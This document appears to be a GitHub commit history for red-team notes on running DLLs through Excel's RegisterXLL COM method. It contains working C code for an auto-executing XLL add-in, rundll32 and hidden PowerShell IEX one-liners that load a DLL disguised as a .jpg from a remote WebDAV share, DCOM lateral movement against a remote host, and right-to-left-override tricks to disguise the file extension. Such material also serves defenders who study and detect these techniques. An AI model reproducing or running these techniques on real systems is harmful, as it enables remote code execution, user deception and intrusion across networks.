rjk11111 · March 22, 2018 17:22 · Jul 23, 2017 · Jul 23, 2017 · Jul 23, 2017 · Mar 21, 2017
diff --git a/ExcelXLL.md b/ExcelXLL.md
@@ -90,4 +90,8 @@ $isx64 = [boolean]$obj.Application.ProductCode[21]
 
 # Load DLL from WebDAV
 $obj.Application.RegisterXLL("\\webdavserver\addins\calcx64.dll")
-```
+```
+
+The DCOM pivoting technique has been added to [Invoke-DCOM.ps1](https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1) by [@rvrsh3ll](https://github.com/rvrsh3ll), thanks to [@rxwx](https://github.com/rxwx)
+
+Here is another [XLL PoC](https://github.com/MoooKitty/xllpoc) by [@MooKitty](https://github.com/MoooKitty)
diff --git a/ExcelXLL.md b/ExcelXLL.md
@@ -4,9 +4,9 @@ A DLL can be loaded and executed via Excel by initializing the Excel.Application
 
 When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: `C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\`. 
 
-The RegisterXLL function expects an XLL which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found here: https://msdn.microsoft.com/en-us/library/office/bb687911.aspx
+The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be [found on MSDN](https://msdn.microsoft.com/en-us/library/office/bb687911.aspx)
 
-The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx ([@buffaloverflow](https://twitter.com/buffaloverflow)) has more notes on this, including a simple example of an XLL: https://gist.github.com/rxwx/3f0b52d1cb669f97dc003b43fc401ba0
+The XLL can also be executed by double-clicking the .xll file, however there is a security warning. [@rxwx](https://github.com/rxwx) has more [notes on this here](https://github.com/rxwx) including his simple example of an XLL.
 
 An interesting thing about Office, is it will perform file format sniffing for certain extensions, such as .xls, .xlk, and .doc (and probably more). This means that you can rename the .xll to a .xls or .xlk and it will still open. However, the initial add-in warning is still triggered, along with another warning that mentions the file format and extension don't match. 
 
@@ -79,7 +79,7 @@ $excel.RegisterXLL("\\webdavserver\files\evilDLL.jpg");
 powershell -w hidden -c "IEX ((New-Object -ComObject Excel.Application).RegisterXLL('\\webdavserver\files\evilDLL.jpg'))"
 ```
 
-@rxwx ([@buffaloverflow](https://twitter.com/buffaloverflow)) discovered that this can also be used for lateral movement in environments that support DCOM [source](https://twitter.com/buffaloverflow/status/888427071327916032), here is an example:
+[@rxwx](https://github.com/rxwx) discovered that this can also be used for lateral movement in environments that support DCOM [source](https://twitter.com/buffaloverflow/status/888427071327916032), here is an example:
 
 ```powershell
 $Com = [Type]::GetTypeFromProgID("Excel.Application","192.168.1.111")

diff --git a/ExcelXLL.md b/ExcelXLL.md
@@ -0,0 +1,93 @@
+# DLL Execution via Excel.Application RegisterXLL() method
+
+A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does *not* need to be local, it can also be a UNC path that points to a remote WebDAV server. 
+
+When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: `C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\`. 
+
+The RegisterXLL function expects an XLL which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found here: https://msdn.microsoft.com/en-us/library/office/bb687911.aspx
+
+The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx ([@buffaloverflow](https://twitter.com/buffaloverflow)) has more notes on this, including a simple example of an XLL: https://gist.github.com/rxwx/3f0b52d1cb669f97dc003b43fc401ba0
+
+An interesting thing about Office, is it will perform file format sniffing for certain extensions, such as .xls, .xlk, and .doc (and probably more). This means that you can rename the .xll to a .xls or .xlk and it will still open. However, the initial add-in warning is still triggered, along with another warning that mentions the file format and extension don't match. 
+
+Since the add-in warning shows the full path to the filename, certain unicode characters can be used to mask the .xll extension. One of my favorites is the [Right-to-Left Override Character] (http://www.fileformat.info/info/unicode/char/202e/index.htm). By using this character, you can make the Excel file appear as if it has any extension. For example, the filename `Footba\u202Eslx.xll` would display as `Footballx.xls`, since everything after the character is reversed.
+
+Here is a basic example of a DLL with the required xlAutoOpen export to make it an XLL that executes on open. As with any DLL, execution can also be triggered in the `DLL_PROCESS_ATTACH` case.
+
+```c
+// Compile with: cl.exe notepadXLL.c /LD /o notepad.xll
+#include <Windows.h>
+
+__declspec(dllexport) void __cdecl xlAutoOpen(void); 
+
+void __cdecl xlAutoOpen() {
+    // Triggers when Excel opens
+    WinExec("cmd.exe /c notepad.exe", 1);
+}
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}
+```
+
+Below are samples of various ways this can be executed.
+
+Javascript:
+
+```javascript
+// Create Instace of Excel.Application COM object
+var excel = new ActiveXObject("Excel.Application");
+
+// Pass in path to the DLL (can use any extension)
+excel.RegisterXLL("C:\\Users\\Bob\\AppData\\Local\\Temp\\evilDLL.xyz");
+
+// Delivered via WebDAV
+excel.RegisterXLL("\\\\webdavserver\\files\\evilDLL.jpg");
+```
+
+Rundll32.exe mshtml.dll one-liner:
+
+```
+rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('\\\\webdavserver\\files\\evilDLL.jpg');this.close();
+```
+
+Powershell:
+
+```powershell
+# Create Instace of Excel.Application COM object
+$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
+
+# Pass in path to the DLL (can use any extension)
+$excel.RegisterXLL("C:\Users\Bob\Downloads\evilDLL.txt")
+
+# Delivered via WebDAV
+$excel.RegisterXLL("\\webdavserver\files\evilDLL.jpg");
+
+# One liner with WebDAV: 
+powershell -w hidden -c "IEX ((New-Object -ComObject Excel.Application).RegisterXLL('\\webdavserver\files\evilDLL.jpg'))"
+```
+
+@rxwx ([@buffaloverflow](https://twitter.com/buffaloverflow)) discovered that this can also be used for lateral movement in environments that support DCOM [source](https://twitter.com/buffaloverflow/status/888427071327916032), here is an example:
+
+```powershell
+$Com = [Type]::GetTypeFromProgID("Excel.Application","192.168.1.111")
+$Obj = [System.Activator]::CreateInstance($Com)
+
+# Detect Office bitness so proper DLL can be used
+$isx64 = [boolean]$obj.Application.ProductCode[21]
+
+# Load DLL from WebDAV
+$obj.Application.RegisterXLL("\\webdavserver\addins\calcx64.dll")
+```
diff --git a/excel.bat b/excel.bat
@@ -1,2 +0,0 @@
-REM rundll32 mshtml.dll HTA one-liner command:
-rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();

diff --git a/excel.js b/excel.js
@@ -1,4 +0,0 @@
-// Create Instace of Excel.Application COM object
-var excel = new ActiveXObject("Excel.Application");
-// Pass in path to the DLL (can use any extension)
-excel.RegisterXLL("C:\\Users\\Bob\\AppData\\Local\\Temp\\evilDLL.xyz");

diff --git a/excel.ps1 b/excel.ps1
@@ -1,4 +0,0 @@
-# Create Instace of Excel.Application COM object
-$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
-# Pass in path to the DLL (can use any extension)
-$excel.RegisterXLL("C:\Users\Bob\Downloads\evilDLL.txt")

diff --git a/excel.bat b/excel.bat
@@ -0,0 +1,2 @@
+REM rundll32 mshtml.dll HTA one-liner command:
+rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
diff --git a/excel.js b/excel.js
@@ -0,0 +1,4 @@
+// Create Instace of Excel.Application COM object
+var excel = new ActiveXObject("Excel.Application");
+// Pass in path to the DLL (can use any extension)
+excel.RegisterXLL("C:\\Users\\Bob\\AppData\\Local\\Temp\\evilDLL.xyz");
diff --git a/excel.ps1 b/excel.ps1
@@ -0,0 +1,4 @@
+# Create Instace of Excel.Application COM object
+$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
+# Pass in path to the DLL (can use any extension)
+$excel.RegisterXLL("C:\Users\Bob\Downloads\evilDLL.txt")
Original file line number	Diff line number	Diff line change
		@@ -1,2 +0,0 @@
		REM rundll32 mshtml.dll HTA one-liner command:
		rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1,2 @@
		REM rundll32 mshtml.dll HTA one-liner command:
		rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();